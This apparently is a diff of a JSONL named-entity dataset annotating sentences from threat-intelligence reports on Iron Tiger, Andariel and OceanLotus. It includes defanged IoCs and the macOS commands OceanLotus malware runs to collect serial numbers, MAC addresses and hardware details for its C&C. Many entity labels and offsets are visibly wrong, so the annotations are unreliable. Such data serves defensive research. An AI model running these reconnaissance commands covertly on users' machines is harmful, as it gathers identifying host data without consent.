exchange.","entities":[{"id":1845,"label":"SHA2","start_offset":104,"end_offset":168},{"id":44776,"label":"identity","start_offset":198,"end_offset":229}],"relations":[{"id":164,"from_id":44776,"to_id":1845,"type":"owns"}],"Comments":[]} +{"id":5247,"text":"Sphinx was active between June 2014 and November 2015, but timestamps of the malware indicate the attacks started as early as 2011.","entities":[{"id":51283,"label":"TIME","start_offset":26,"end_offset":35},{"id":51285,"label":"TIME","start_offset":126,"end_offset":130},{"id":51282,"label":"campaign","start_offset":0,"end_offset":6},{"id":51284,"label":"TIME","start_offset":40,"end_offset":53}],"relations":[],"Comments":[]} +{"id":14186,"text":"Oil and gas, banking and defense sectors are most likely to top of the list of targets.","entities":[],"relations":[],"Comments":[]} +{"id":9102,"text":"During this time we developed URL-based signatures and used them to detect Lurk-related network traffic.","entities":[{"id":28099,"label":"location","start_offset":12,"end_offset":16},{"id":28100,"label":"location","start_offset":51,"end_offset":54},{"id":28101,"label":"location","start_offset":60,"end_offset":64},{"id":28102,"label":"malware","start_offset":75,"end_offset":79}],"relations":[],"Comments":[]} +{"id":5023,"text":"Similar to recently observed activity, these campaigns were sent via email and contained a unique link per target that led to a DOCX file hosted on attacker controlled infrastructure.","entities":[],"relations":[],"Comments":[]} +{"id":14196,"text":"But on top of that, organizations must have the detection and response tooling, ideally XDR, to correlate, prioritize and act on high fidelity alerts with speed and precision.","entities":[],"relations":[],"Comments":[]} +{"id":5334,"text":" The server must reply with an exact four-byte answer, which is the victim's IPv4 address.","entities":[],"relations":[],"Comments":[]} +{"id":3045,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":5211,"text":"Table 3 shows that the BAF is greater than one, implying there are asymmetric network flows although the values are at the order of magnitude lower than modern amplification attacks (note that Memcached can reach 10,000 to 51,000 BAF).","entities":[],"relations":[],"Comments":[]} +{"id":11549,"text":"This group also has links to the original developers of H-Worm, also known as njRAT.","entities":[{"id":35390,"label":"malware","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} +{"id":5165,"text":"How are you looking for visibility across all of your systems?","entities":[],"relations":[],"Comments":[]} +{"id":2308,"text":"The macOS exploits did not use the same framework as iOS ones.","entities":[{"id":47374,"label":"SOFTWARE","start_offset":4,"end_offset":9},{"id":47375,"label":"SOFTWARE","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} +{"id":11173,"text":"We terminated 1,312 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} +{"id":13729,"text":"The typical Waterbear infection chain Figure 1.","entities":[{"id":42690,"label":"tools","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} +{"id":13343,"text":"The screenshot in Figure 2 shows how the threat actor uses SMB and internal IIS Web Service to copy \"lc.tmp\" (the main ransomware loader in this incident) to other victims' host machines.","entities":[{"id":41526,"label":"location","start_offset":63,"end_offset":66},{"id":41527,"label":"attack-pattern","start_offset":80,"end_offset":91},{"id":41528,"label":"location","start_offset":173,"end_offset":177}],"relations":[],"Comments":[]} +{"id":12356,"text":"Shortly after the U.S. Treasury sanctioned Ukrainian Parliament member Andrii Derkach for attempting to influence the U.S. electoral process, we removed 14 Google accounts that were linked to him.","entities":[],"relations":[],"Comments":[]} +{"id":11193,"text":" HYPERSCRAPE requires the victim\u2019s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired.","entities":[],"relations":[],"Comments":[]} +{"id":8123,"text":" Figure 10. Steps FileCrypt Manager prompts user to do","entities":[],"relations":[],"Comments":[]} +{"id":12824,"text":"Similar Objectives.","entities":[],"relations":[],"Comments":[]} +{"id":10605,"text":"In the past, we\u2019ve posted on issues like phishing campaigns, vulnerabilities and disinformation.","entities":[{"id":32350,"label":"attack-pattern","start_offset":41,"end_offset":49},{"id":32351,"label":"location","start_offset":77,"end_offset":80}],"relations":[],"Comments":[]} +{"id":4170,"text":" Code Similarity","entities":[],"relations":[],"Comments":[]} +{"id":1884,"text":"In the process of monitoring changes in the threat landscape, we get a clearer insight into the way threat actors work behind the schemes.","entities":[],"relations":[],"Comments":[]} +{"id":5554,"text":"They use a one-time generated series of numbers for each transaction, so that if attackers get their hands on it, they won\u2019t be able to use it in the future.","entities":[],"relations":[],"Comments":[]} +{"id":3893,"text":"According to the agency, critical infrastructure owners and operators should also adopt an \"heightened state of awareness\".","entities":[],"relations":[],"Comments":[]} +{"id":4823,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50766,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50767,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50768,"label":"location","start_offset":50,"end_offset":57}],"relations":[{"id":1011,"from_id":50767,"to_id":50766,"type":"duplicate-of"},{"id":1012,"from_id":50766,"to_id":50768,"type":"attributed-to"}],"Comments":[]} {"id":7071,"text":"On two occasions (in March and October 2020), we found a kernel rootkit that had been deployed.","entities":[{"id":22150,"label":"location","start_offset":27,"end_offset":30},{"id":22152,"label":"attack-pattern","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} -{"id":7072,"text":"After analysis, it appears that this rootkit’s behavior is very similar to that of the NDISProxy driver and remote access trojan (RAT).","entities":[{"id":22153,"label":"attack-pattern","start_offset":37,"end_offset":44},{"id":22154,"label":"location","start_offset":97,"end_offset":103},{"id":22155,"label":"location","start_offset":104,"end_offset":107},{"id":22156,"label":"location","start_offset":108,"end_offset":114}],"relations":[],"Comments":[]} -{"id":7075,"text":"The rootkit has multiple stages before getting to the actual payload:","entities":[{"id":22166,"label":"attack-pattern","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":7077,"text":"This is done in conjunction with the Process Monitor driver (procxp152.sys), both of which are dropped upon loading the rootkit, even if they are not originally installed in the machine.","entities":[{"id":22174,"label":"location","start_offset":45,"end_offset":52},{"id":22175,"label":"location","start_offset":53,"end_offset":59},{"id":22176,"label":"location","start_offset":91,"end_offset":94},{"id":22177,"label":"attack-pattern","start_offset":120,"end_offset":127},{"id":22178,"label":"location","start_offset":142,"end_offset":145}],"relations":[],"Comments":[]} -{"id":7079,"text":"Injects final payload into \"lsass.exe\" Stage 3 - Final Payload Installs itself as a Windows service","entities":[],"relations":[],"Comments":[]} -{"id":7081,"text":"Each backdoor has a different token that is encrypted in the registry.","entities":[],"relations":[],"Comments":[]} -{"id":7083,"text":"In the version that we’ve analyzed, the installer writes the token in the registry key.","entities":[],"relations":[],"Comments":[]} -{"id":7086,"text":"Pandora backdoor samples with different tokens Based on our analysis, the Pandora backdoor contains more public code repositories compared with previous versions.","entities":[{"id":22195,"label":"malware","start_offset":0,"end_offset":7},{"id":22197,"label":"location","start_offset":105,"end_offset":111}],"relations":[],"Comments":[]} -{"id":7087,"text":"Feature Name Repository Driver memory injection Blackbone https:\/\/github.com\/DarthTon\/Blackbone NDIS network filtering driver WFP Sample \"WDK\\Windows Filtering Platform Stream Edit Sample\/C++\/sys\/stream_callout.c” ","entities":[{"id":22198,"label":"location","start_offset":27,"end_offset":33},{"id":22199,"label":"attack-pattern","start_offset":34,"end_offset":50},{"id":22200,"label":"URL","start_offset":63,"end_offset":100},{"id":22201,"label":"location","start_offset":125,"end_offset":131},{"id":22202,"label":"location","start_offset":137,"end_offset":143},{"id":22203,"label":"location","start_offset":189,"end_offset":195}],"relations":[],"Comments":[]} -{"id":7088,"text":"Parse HTTP packets HTTP Parser https:\/\/github.com\/nodejs\/http-parser ","entities":[{"id":22204,"label":"URL","start_offset":33,"end_offset":70}],"relations":[],"Comments":[]} -{"id":7090,"text":" https:\/\/github.com\/hfiref0x\/Stryker","entities":[],"relations":[],"Comments":[]} -{"id":7091,"text":"Encrypted Communication D3DES https:\/\/gitlab.gnome.org\/GNOME\/gtk-vnc\/-\/blob\/v0.1.0\/src\/d3des.c Compression QuickLZ https:\/\/github.com\/robottwo\/quicklz Table 4.","entities":[{"id":22208,"label":"URL","start_offset":121,"end_offset":156}],"relations":[],"Comments":[]} -{"id":7092,"text":"Pandora’s public code repositories Rootkits From a Public Repository","entities":[{"id":22210,"label":"malware","start_offset":0,"end_offset":7},{"id":22211,"label":"location","start_offset":10,"end_offset":16},{"id":22212,"label":"location","start_offset":51,"end_offset":57}],"relations":[],"Comments":[]} -{"id":7095,"text":" Hidden.sys - https:\/\/github.com\/JKornev\/hidden\/tree\/master\/ ","entities":[{"id":22220,"label":"URL","start_offset":16,"end_offset":62}],"relations":[],"Comments":[]} -{"id":7099,"text":"The certificate has been valid since February 2020.","entities":[],"relations":[],"Comments":[]} -{"id":7104,"text":"Hidden Registry\/Folder\/File Type Value REG HKLM\\SYSTEM\\CurrentControlSet\\services\\HiddenService REG HKLM\\SYSTEM\\CurrentControlSet\\services\\servTest REG HKLM\\SYSTEM\\CurrentControlSet\\services\\TrkWkss Folder C:\\programdata\\vlc File C:\\programdata\\vlc\\vlc.exe Folder C:\\programdata\\test File C:\\programdata\\test\\dlpumgr32.exe File C:\\windows\\system32\\drivers\\Hidden.sys File C:\\windows\\system32\\HiddenService.exe Table 5.","entities":[{"id":22245,"label":"location","start_offset":29,"end_offset":33},{"id":22246,"label":"malware","start_offset":42,"end_offset":45},{"id":22247,"label":"REGISTRYKEY","start_offset":47,"end_offset":99},{"id":22248,"label":"malware","start_offset":101,"end_offset":104},{"id":22249,"label":"REGISTRYKEY","start_offset":106,"end_offset":153},{"id":22250,"label":"malware","start_offset":155,"end_offset":158},{"id":22251,"label":"REGISTRYKEY","start_offset":160,"end_offset":206}],"relations":[],"Comments":[]} -{"id":7106,"text":"The references to “Hidden” are related to the rootkit itself.","entities":[{"id":22254,"label":"location","start_offset":27,"end_offset":30},{"id":22255,"label":"attack-pattern","start_offset":46,"end_offset":53}],"relations":[],"Comments":[]} -{"id":7107,"text":"The “dlpumgr32.exe” and “servTest” lines are related to the new version of SysUpdate which we described earlier.","entities":[{"id":22256,"label":"location","start_offset":20,"end_offset":23},{"id":22257,"label":"location","start_offset":41,"end_offset":44},{"id":22258,"label":"malware","start_offset":75,"end_offset":84}],"relations":[],"Comments":[]} -{"id":7108,"text":" We do not know which malware variant is being sideloaded by vlc.exe.","entities":[],"relations":[],"Comments":[]} -{"id":7109,"text":"It is probably installed as a service named “TrkWkss.”","entities":[],"relations":[],"Comments":[]} -{"id":7111,"text":" This confirms that this threat actor is abusing this legitimate program to sideload its backdoors.","entities":[],"relations":[],"Comments":[]} -{"id":7112,"text":"HyperBro Malware Family","entities":[{"id":22264,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} -{"id":7113,"text":"The Iron Tiger APT group has used the HyperBro malware family since at least 2017.","entities":[{"id":22266,"label":"malware","start_offset":38,"end_offset":46}],"relations":[],"Comments":[]} -{"id":7114,"text":"It is the evolved version of HttpBrowser, which the group has been using since at least 2015.","entities":[{"id":22268,"label":"malware","start_offset":29,"end_offset":40}],"relations":[],"Comments":[]} -{"id":7116,"text":"All the requests were sent to the C&C server on port 443, with “\/ajax” as the uniform resource identifier (URI).","entities":[],"relations":[],"Comments":[]} -{"id":7117,"text":"While investigating Operation DRBControl, we found an updated version of this malware family that implements some new classes.","entities":[{"id":22272,"label":"threat-actor","start_offset":20,"end_offset":40}],"relations":[],"Comments":[]} -{"id":7118,"text":"We provided a detailed analysis of this new HyperBro version in our research.","entities":[{"id":22273,"label":"malware","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} -{"id":7122,"text":"However, we continue seeing samples that feature the “older” behaviors, which suggests that different groups — or possibly subgroups of Iron Tiger — are using this malware family.","entities":[{"id":22278,"label":"threat-actor","start_offset":136,"end_offset":146},{"id":22279,"label":"location","start_offset":149,"end_offset":152}],"relations":[],"Comments":[]} -{"id":7124,"text":"FRP Tool","entities":[{"id":22283,"label":"malware","start_offset":0,"end_offset":3},{"id":22284,"label":"location","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} -{"id":7125,"text":"We found the FRP tool being used on a Linux host, which is similar to Avast’s findings in a report that they published on the Iron Tiger threat actor.","entities":[{"id":22285,"label":"tools","start_offset":13,"end_offset":16},{"id":22286,"label":"location","start_offset":17,"end_offset":21},{"id":22287,"label":"location","start_offset":44,"end_offset":48},{"id":22288,"label":"identity","start_offset":70,"end_offset":75},{"id":22289,"label":"threat-actor","start_offset":126,"end_offset":136}],"relations":[],"Comments":[]} -{"id":7126,"text":"The FRP tool that we analyzed was a modified version, which was possibly copied off of Github.","entities":[{"id":22290,"label":"malware","start_offset":4,"end_offset":7},{"id":22291,"label":"location","start_offset":8,"end_offset":12}],"relations":[],"Comments":[]} -{"id":7128,"text":"We found three new samples of the Type 1 malware family that abuses Dropbox as a secondary C&C channel, which we described in our Operation DRBControl whitepaper.","entities":[{"id":22294,"label":"location","start_offset":34,"end_offset":38},{"id":22295,"label":"malware","start_offset":68,"end_offset":75}],"relations":[],"Comments":[]} -{"id":7131,"text":"This shows that the development is still active.","entities":[],"relations":[],"Comments":[]} -{"id":7134,"text":"We believe that this was a direct reaction to our research, suggesting that the threat actor read our investigation.","entities":[],"relations":[],"Comments":[]} -{"id":7138,"text":"This shows that the threat actors intended to confuse forensics investigators with incorrect timestamps, which is why it’s critical to analyze timestamps with caution during investigations.","entities":[],"relations":[],"Comments":[]} -{"id":7139,"text":"Infection Vector","entities":[{"id":22318,"label":"tools","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} -{"id":7140,"text":"We could not confirm the primary infection vector.","entities":[{"id":22319,"label":"tools","start_offset":43,"end_offset":49}],"relations":[],"Comments":[]} -{"id":7141,"text":"However, traces of the exploitation of the Microsoft Exchange vulnerability CVE-2020-0688 were found.","entities":[],"relations":[],"Comments":[]} -{"id":7142,"text":"Multiple infection vectors have been attributed to this threat actor in the past: Watering holes","entities":[],"relations":[],"Comments":[]} -{"id":7143,"text":"Weaponized documents exploiting the Dynamic Data Exchange (DDE) method Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor Exploitation of the CVE-2019-0604 vulnerability in Sharepoint Supply chain attack that compromises a chat software installer, Able Desktop Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server","entities":[{"id":22321,"label":"attack-pattern","start_offset":36,"end_offset":57},{"id":22322,"label":"threat-actor","start_offset":138,"end_offset":146},{"id":22323,"label":"location","start_offset":216,"end_offset":222},{"id":22324,"label":"location","start_offset":255,"end_offset":259},{"id":22325,"label":"location","start_offset":342,"end_offset":347},{"id":22326,"label":"location","start_offset":381,"end_offset":384},{"id":22327,"label":"identity","start_offset":404,"end_offset":413},{"id":22328,"label":"location","start_offset":414,"end_offset":422}],"relations":[],"Comments":[]} -{"id":7144,"text":"During our investigation, we found some old samples that fit in these categories but have not been reported.","entities":[],"relations":[],"Comments":[]} -{"id":7146,"text":"Targets","entities":[],"relations":[],"Comments":[]} -{"id":7147,"text":"The closer look into Iron Tiger was prompted because of an incident response investigation involving a Philippine-based gambling company that the group targeted.","entities":[],"relations":[],"Comments":[]} -{"id":7151,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":7152,"text":"The countries that Iron Tiger has targeted in the past 18 months Timeline","entities":[],"relations":[],"Comments":[]} -{"id":7154,"text":"New sample of Type 1 malware variant and a rootkit called Pandora found April 2020: One rootkit sample for hiding files processes, files, and services found October 2020:","entities":[{"id":22365,"label":"location","start_offset":4,"end_offset":10},{"id":22366,"label":"location","start_offset":14,"end_offset":18},{"id":22367,"label":"location","start_offset":37,"end_offset":40},{"id":22368,"label":"attack-pattern","start_offset":43,"end_offset":50},{"id":22372,"label":"attack-pattern","start_offset":88,"end_offset":95},{"id":22373,"label":"location","start_offset":96,"end_offset":102},{"id":22374,"label":"location","start_offset":138,"end_offset":141}],"relations":[],"Comments":[]} -{"id":7155,"text":"New HyperBro and Pandora samples found December 2020:","entities":[{"id":22376,"label":"malware","start_offset":4,"end_offset":12},{"id":22377,"label":"location","start_offset":13,"end_offset":16}],"relations":[],"Comments":[]} -{"id":7156,"text":"One sample of the SysUpdate malware variant found January 2021:","entities":[{"id":22381,"label":"location","start_offset":4,"end_offset":10},{"id":22382,"label":"malware","start_offset":18,"end_offset":27}],"relations":[],"Comments":[]} -{"id":7157,"text":"Fast Reverse Proxy (FRP) Linux tool found Conclusion","entities":[{"id":22384,"label":"malware","start_offset":20,"end_offset":23},{"id":22385,"label":"location","start_offset":31,"end_offset":35}],"relations":[],"Comments":[]} -{"id":7159,"text":"We detailed how Iron Tiger threat actors have updated their tools, adding new features, and slightly changing their tactics, techniques, and procedures (TTPs), notably by using a rootkit to hide its backdoors.","entities":[{"id":22396,"label":"location","start_offset":88,"end_offset":91},{"id":22397,"label":"location","start_offset":137,"end_offset":140},{"id":22398,"label":"attack-pattern","start_offset":179,"end_offset":186}],"relations":[],"Comments":[]} -{"id":7161,"text":"We expect to see more cases involving four or five files instead of the usual “trident” in the future.","entities":[{"id":22402,"label":"threat-actor","start_offset":79,"end_offset":86}],"relations":[],"Comments":[]} -{"id":7164,"text":"Updated June 18, 2018, 10:05 AM to add new IoC information from IssueMakersLab's July investigation.","entities":[{"id":22406,"label":"TIME","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} -{"id":7165,"text":"We updated it again at 4:30 PM to add a link to IssueMakersLab's website and to add new IoC information.","entities":[{"id":22409,"label":"TIME","start_offset":23,"end_offset":30},{"id":22411,"label":"location","start_offset":73,"end_offset":76}],"relations":[],"Comments":[]} -{"id":7166,"text":"This research is done in cooperation with IssueMakersLab of South Korea.","entities":[],"relations":[],"Comments":[]} -{"id":7169,"text":"Last month we tracked new scouting techniques coming from Andariel, which were used mainly against South Korean targets.","entities":[],"relations":[],"Comments":[]} -{"id":7170,"text":" Andariel has been quite active these past few months.","entities":[],"relations":[],"Comments":[]} -{"id":7172,"text":"But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes.","entities":[],"relations":[],"Comments":[]} -{"id":7176,"text":"This was possibly part of their reconnaissance strategy, to find the right targets for their exploit.","entities":[],"relations":[],"Comments":[]} -{"id":7178,"text":"To help prevent any damage, we decided to publish our findings before the group deploys the attack.","entities":[],"relations":[],"Comments":[]} -{"id":7179,"text":" Figure 1. Watering hole reconnaissance flow Analysis of the Andariel techniques","entities":[{"id":22443,"label":"location","start_offset":20,"end_offset":24},{"id":22444,"label":"threat-actor","start_offset":61,"end_offset":69}],"relations":[],"Comments":[]} -{"id":7180,"text":"On June 21, we found that the website of a Korean non-profit organization was compromised with an injected script that collected visitors’ information.","entities":[],"relations":[],"Comments":[]} -{"id":7182,"text":"This reconnaissance lasted until 27 June.","entities":[],"relations":[],"Comments":[]} -{"id":7183,"text":"We already notified the websites about the compromise.","entities":[],"relations":[],"Comments":[]} -{"id":7190,"text":"IssueMakersLab also listed the ActiveX objects that the Andariel group attacked.","entities":[],"relations":[],"Comments":[]} -{"id":7193,"text":"Another is “WSACTIVEBRIDGEAX.WSActiveBridgeAXCtrl.1”, which is related to a South Korea-based voice conversion software company.","entities":[],"relations":[],"Comments":[]} -{"id":7197,"text":"Parameter Meaning Parameter Meaning w Website name w Website name r value r value o OS version o OS version lv HTTP Accept-Language lv HTTP Accept-Language bt Browser Information bt Browser Information bv Browser Information bv Browser Information bdv Browser Information bdv Browser Information fv Flash Version fv Flash Version silv Silverlight Version silv Silverlight Version ez EasyPayPlugin ActiveX Availability ez EasyPayPlugin ActiveX Availability ac ACUBEFILECTRL ActiveX Availability* - - - - mg MagicLoaderX ActiveX Availability - - nv","entities":[],"relations":[],"Comments":[]} -{"id":7198,"text":"NVersionMan ActiveX Availability si SIClientAccess ActiveX Availability si SIClientAccess ActiveX Availability du DUZONERPSSO ActiveX Availability du DUZONERPSSO ActiveX Availability iw INIWALLET61 ActiveX Availability - - - - ad admctrl ActiveX Availability","entities":[],"relations":[],"Comments":[]} -{"id":7201,"text":"Besides the ActiveX objects, we noticed that the script added new code to connect websocket to localhost.","entities":[],"relations":[],"Comments":[]} -{"id":7205,"text":"This shows that the attacker has expanded his target base, and is interested in the software itself and not just their ActiveX objects.","entities":[{"id":22512,"label":"location","start_offset":46,"end_offset":52},{"id":22513,"label":"location","start_offset":59,"end_offset":62},{"id":22514,"label":"location","start_offset":100,"end_offset":103},{"id":22515,"label":"identity","start_offset":108,"end_offset":112}],"relations":[],"Comments":[]} -{"id":7215,"text":"Indicators of Compromise (IoC) IoCs Description cfcd391eec9fca663afd9a4a152e62af665e8f695a16537e061e924a3b63c3b9","entities":[{"id":22549,"label":"SHA1","start_offset":49,"end_offset":113}],"relations":[],"Comments":[]} -{"id":7216,"text":"Injected Script in May 2018 e0e30eb5e5ff1e71548c4405d04ce16b94c4cb7f8c2ed9bd75933cea53533114 Injected Script in June 2018 67a1312768c4ca3379181c0fcc1143460efcb4bff7a4774c9c775043964c0878","entities":[{"id":22551,"label":"SHA2","start_offset":28,"end_offset":92},{"id":22553,"label":"SHA2","start_offset":122,"end_offset":186}],"relations":[],"Comments":[]} -{"id":7217,"text":"Injected Script in 17 July 2018 hxxp:\/\/aega[.]co[.]kr\/mall\/skin\/skin.php","entities":[],"relations":[],"Comments":[]} -{"id":7218,"text":"Compromised site (received information May 2018) hxxp:\/\/www[.]peaceind[.]co[.]kr\/board\/icon\/image.php","entities":[],"relations":[],"Comments":[]} -{"id":7219,"text":"Compromised site (received information May 2018) hxxp:\/\/alphap1[.]com\/hdd\/images\/image.php Compromised site (received information May 2018) hxxp:\/\/adfamc[.]com\/editor\/sorak\/image.php Compromised site (received information June 2018) hxxp:\/\/adfamc[.[com\/editor\/sorak\/skin.php Compromised site (received information 17 July 2018)","entities":[],"relations":[],"Comments":[]} -{"id":7224,"text":"Like previous websites we’ve seen set up by this actor, this website has a link to their PGP public key at the bottom of the page.","entities":[{"id":22574,"label":"location","start_offset":93,"end_offset":99},{"id":22575,"label":"malware","start_offset":125,"end_offset":129}],"relations":[],"Comments":[]} -{"id":7232,"text":"We encourage anyone who discovers a Chrome vulnerability to report that activity through the Chrome Vulnerabilities Rewards Program submission process.","entities":[],"relations":[],"Comments":[]} -{"id":7238,"text":"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.","entities":[{"id":22622,"label":"threat-actor","start_offset":26,"end_offset":29},{"id":22623,"label":"location","start_offset":30,"end_offset":33},{"id":22624,"label":"location","start_offset":147,"end_offset":155},{"id":22625,"label":"location","start_offset":169,"end_offset":175},{"id":22626,"label":"location","start_offset":233,"end_offset":241}],"relations":[],"Comments":[]} -{"id":7241,"text":"In the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake.","entities":[{"id":22635,"label":"malware","start_offset":80,"end_offset":87},{"id":22636,"label":"location","start_offset":88,"end_offset":93}],"relations":[],"Comments":[]} -{"id":7246,"text":"Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events.","entities":[{"id":22647,"label":"attack-pattern","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} -{"id":7247,"text":"The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.","entities":[],"relations":[],"Comments":[]} -{"id":7249,"text":"In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog.","entities":[],"relations":[],"Comments":[]} -{"id":7254,"text":"We encourage anyone who discovers a Chrome vulnerability to report that activity via the Chrome VRP submission process.","entities":[],"relations":[],"Comments":[]} -{"id":7257,"text":"If you have communicated with any of these accounts or visited the actors’ blog, we suggest you review your systems for the IOCs provided below.","entities":[],"relations":[],"Comments":[]} -{"id":7260,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":22682,"label":"location","start_offset":0,"end_offset":4},{"id":22683,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":22684,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":22685,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} -{"id":7261,"text":"We recently discovered a new backdoor we believe to be related to the OceanLotus group.","entities":[],"relations":[],"Comments":[]} -{"id":7265,"text":" Figures 1-2.","entities":[],"relations":[],"Comments":[]} -{"id":7267,"text":"Recently they have also been discovered by researchers from Volexity to be using malicious websites to propagate malware.","entities":[],"relations":[],"Comments":[]} +{"id":5219,"text":"Proper supply chain management processes allow contextualization, tracking, and monitoring of new vulnerabilities within different downstream software using a specific library such as DDS.","entities":[],"relations":[],"Comments":[]} +{"id":9348,"text":"It also receives commands from the C&C server to take screenshots, which it later sends to the server.","entities":[],"relations":[],"Comments":[]} +{"id":13695,"text":"Here are some tips on how to stay protected from email scams: ","entities":[],"relations":[],"Comments":[]} +{"id":1819,"text":"Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products.","entities":[{"id":46934,"label":"tools","start_offset":77,"end_offset":87},{"id":46936,"label":"attack-pattern","start_offset":91,"end_offset":113},{"id":46937,"label":"attack-pattern","start_offset":118,"end_offset":143}],"relations":[{"id":265,"from_id":46934,"to_id":46936,"type":"uses"},{"id":266,"from_id":46934,"to_id":46937,"type":"uses"}],"Comments":[]} {"id":7269,"text":"Arrival","entities":[],"relations":[],"Comments":[]} -{"id":7271,"text":"It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file.","entities":[],"relations":[],"Comments":[]} -{"id":7272,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":7277,"text":" The 3 bytes \"efb880\" is in UTF-8 encoding.","entities":[],"relations":[],"Comments":[]} -{"id":7278,"text":"According to UTF-8 mapping, the related Unicode code is \"U+FE00\".","entities":[],"relations":[],"Comments":[]} -{"id":7280,"text":"UTF-8","entities":[],"relations":[],"Comments":[]} -{"id":7281,"text":"mapping","entities":[],"relations":[],"Comments":[]} -{"id":7282,"text":"\"U+FE00\" is a special Unicode control character with name variation selector-1, which provides the visual appearance of a CJK compatibility ideograph.","entities":[],"relations":[],"Comments":[]} -{"id":7285,"text":"Otherwise, if the postfix is .doc without special characters, Microsoft Word is called to open the app bundle as a document; but since it is not a valid document, the app fails to open it.","entities":[],"relations":[],"Comments":[]} -{"id":7286,"text":"Here is the code signing information for the app bundle sample.","entities":[{"id":22729,"label":"attack-pattern","start_offset":12,"end_offset":24},{"id":22730,"label":"location","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} -{"id":7287,"text":" Figure 5. Code signing information for the sample ","entities":[{"id":22732,"label":"attack-pattern","start_offset":15,"end_offset":27},{"id":22733,"label":"location","start_offset":48,"end_offset":54}],"relations":[],"Comments":[]} -{"id":7295,"text":"Plist file ~\/Library\/LaunchAgents\/com.apple.marcoagent.voiceinstallerd.plist","entities":[],"relations":[],"Comments":[]} -{"id":7297,"text":"The timestamp of the dropped files 4) Delete itself","entities":[],"relations":[],"Comments":[]} -{"id":7298,"text":"Third-stage payload","entities":[],"relations":[],"Comments":[]} -{"id":7300,"text":" Figure 10. Encrypted strings Figures 11-12.","entities":[],"relations":[],"Comments":[]} -{"id":7301,"text":"Decryption routine Like older versions of the OceanLotus backdoor, the new version contains two main functions: one for collecting operating system information and submitting this to its malicious C&C servers and receiving additional C&C communication information, and another for the backdoor capabilities.","entities":[{"id":22758,"label":"malware","start_offset":50,"end_offset":60},{"id":22760,"label":"location","start_offset":116,"end_offset":119},{"id":22761,"label":"location","start_offset":164,"end_offset":167},{"id":22762,"label":"location","start_offset":213,"end_offset":216},{"id":22763,"label":"location","start_offset":269,"end_offset":272}],"relations":[],"Comments":[]} -{"id":7302,"text":"It collects the following information from the infected system by invoking the following commands: Command Description system_profiler SPHardwareDataType 2>\/dev\/null | awk '\/Processor \/ {split($0,line,\\\":\\\"); printf(\\\"%s\\\",line[2]);}' Get processor information 15f20 = system_profiler SPHardwareDataType 2>\/dev\/null | awk '\/Memory\/ {split($0,line, \\\":\\\"); printf(\\\"%s\\\", line[2]);}'","entities":[],"relations":[],"Comments":[]} -{"id":7303,"text":" Get memory information ioreg -rd1 -c IOPlatformExpertDevice | awk '\/IOPlatformSerialNumber\/ { split($0, line, \\\"\\\\\\\"\\\"); printf(\\\"%s\\\", line[4]); }","entities":[],"relations":[],"Comments":[]} -{"id":7304,"text":"Get serial number ifconfig -l ifconfig | awk '\/ether \/{print $2}' 2>&1 Get network interface MAC addresses Table 2.","entities":[{"id":22764,"label":"tools","start_offset":21,"end_offset":29},{"id":22765,"label":"tools","start_offset":33,"end_offset":41}],"relations":[],"Comments":[]} -{"id":7305,"text":"OceanLotus commands and descriptions","entities":[{"id":22767,"label":"malware","start_offset":0,"end_offset":10},{"id":22768,"label":"location","start_offset":20,"end_offset":23}],"relations":[],"Comments":[]} -{"id":7307,"text":"TCP stream excerpt of the malware sending information to C&C server","entities":[],"relations":[],"Comments":[]} -{"id":7309,"text":"TCP stream excerpt of the malware receiving commands from C&C server","entities":[],"relations":[],"Comments":[]} -{"id":7317,"text":" Figures 17-18.","entities":[],"relations":[],"Comments":[]} -{"id":7319,"text":" Figure 19. URLs related to mihannevis[.]com as seen on VirusTotal ","entities":[],"relations":[],"Comments":[]} 